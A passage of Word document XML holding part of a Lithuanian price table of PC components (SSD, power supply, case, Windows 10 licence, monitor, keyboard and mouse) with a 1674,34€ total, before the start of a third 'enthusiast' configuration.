                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3E1B53FF" w14:textId="7F228197" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>481</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="426DB6EF" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7678F58D" w14:textId="236E7162" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vidinis diskas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="21848136" w14:textId="434FA3BB" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Samsung SSD 970 EVO NVMe M.2 PCIe 1TB, 3500/2500MB/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="456D487C" w14:textId="2054F297" w:rsidR="0F093E59" w:rsidRPr="005A5C28" w:rsidRDefault="0F093E59" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="42F9225E" w14:textId="31EC9BF8" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>140</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>89€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="09B01D90" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0CFCEC0C" w14:textId="7E574832" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Maitinimo šaltinis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="74FE4D49" w14:textId="39A78DAC" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Fortron HYPER K PRO 600 PSU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="755E8153" w14:textId="347AB91E" w:rsidR="5FFC9099" w:rsidRPr="005A5C28" w:rsidRDefault="5FFC9099" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="76CC1691" w14:textId="2297BB3E" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>29€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="23739FA4" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2AE3ACF5" w14:textId="7BB79566" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Korpusas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="77ABF24A" w14:textId="3DC80913" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DEEPCOOL DP-ATX-DSHIELD-V2 ATX Chassis D-SHIELD V2 1x120mm Pre-installed Black Fan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="29B4B83F" w14:textId="270A5176" w:rsidR="236CA4BB" w:rsidRPr="005A5C28" w:rsidRDefault="236CA4BB" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="61758DB8" w14:textId="185406E4" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>49€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7AE1A821" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3667ADD4" w14:textId="1B7947DB" w:rsidR="7C610705" w:rsidRPr="005A5C28" w:rsidRDefault="7C610705" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operacinė sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="034DAD3A" w14:textId="24E8779D" w:rsidR="7C610705" w:rsidRPr="005A5C28" w:rsidRDefault="7C610705" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operacinė sistema Microsoft Windows 10 Home 32/64 BIT daugiakalbė, elektroninės licenzijos raktas, galima perkelti į kitą kompiuterį (ne dažniau kaip 90 dienų) atsisiunčiama internetu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7777170C" w14:textId="68A205C9" w:rsidR="7C610705" w:rsidRPr="005A5C28" w:rsidRDefault="7C610705" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7BF2B597" w14:textId="63764A5C" w:rsidR="7C610705" w:rsidRPr="005A5C28" w:rsidRDefault="7C610705" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>69€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3B78F060" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="071446C6" w14:textId="329E96E5" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Monitorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1E71032A" w14:textId="6E00AD0A" w:rsidR="0B9CA9AA" w:rsidRPr="005A5C28" w:rsidRDefault="0B9CA9AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AORUS CV27Q Gaming Monitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1ACE8389" w14:textId="25450595" w:rsidR="66C88D4E" w:rsidRPr="005A5C28" w:rsidRDefault="66C88D4E" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="27A8E49E" w14:textId="5B282382" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r w:rsidR="41F4403B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4A02080B" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="253D1334" w14:textId="6C7E4151" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Klavviatūra + pelė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="45FCA834" w14:textId="1CCC46A9" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Bevielė klaviatūra Logitech + Pelė Desktop MK270 (US)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="77586346" w14:textId="61561736" w:rsidR="08D19C49" w:rsidRPr="005A5C28" w:rsidRDefault="08D19C49" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0BB6A0E7" w14:textId="6145D1AC" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="29D98044" w:rsidRPr="005A5C28" w14:paraId="4690A6F4" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="03E213DB" w14:textId="60628F4E" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>IŠ VISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="60869315" w14:textId="4FA0D45C" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7227B5C1" w14:textId="44E53BB4" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7AC34011" w14:textId="455F033F" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="6E01F0C1" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="16EB8260" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>674</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="7ED19197" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="7BC77D18" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02DB7711" w14:textId="2FEA986A" w:rsidR="00B027EA" w:rsidRPr="005A5C28" w:rsidRDefault="00B027EA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107ADD02" w14:textId="2FEA986A" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Trečias variantas skirtas Entuziastams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1EF35C" w14:textId="2ECB1DCE" w:rsidR="00FE41AD" w:rsidRPr="005A5C28" w:rsidRDefault="00FE41AD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5001" w:type="pct"/>
        <w:jc w:val="center"/>
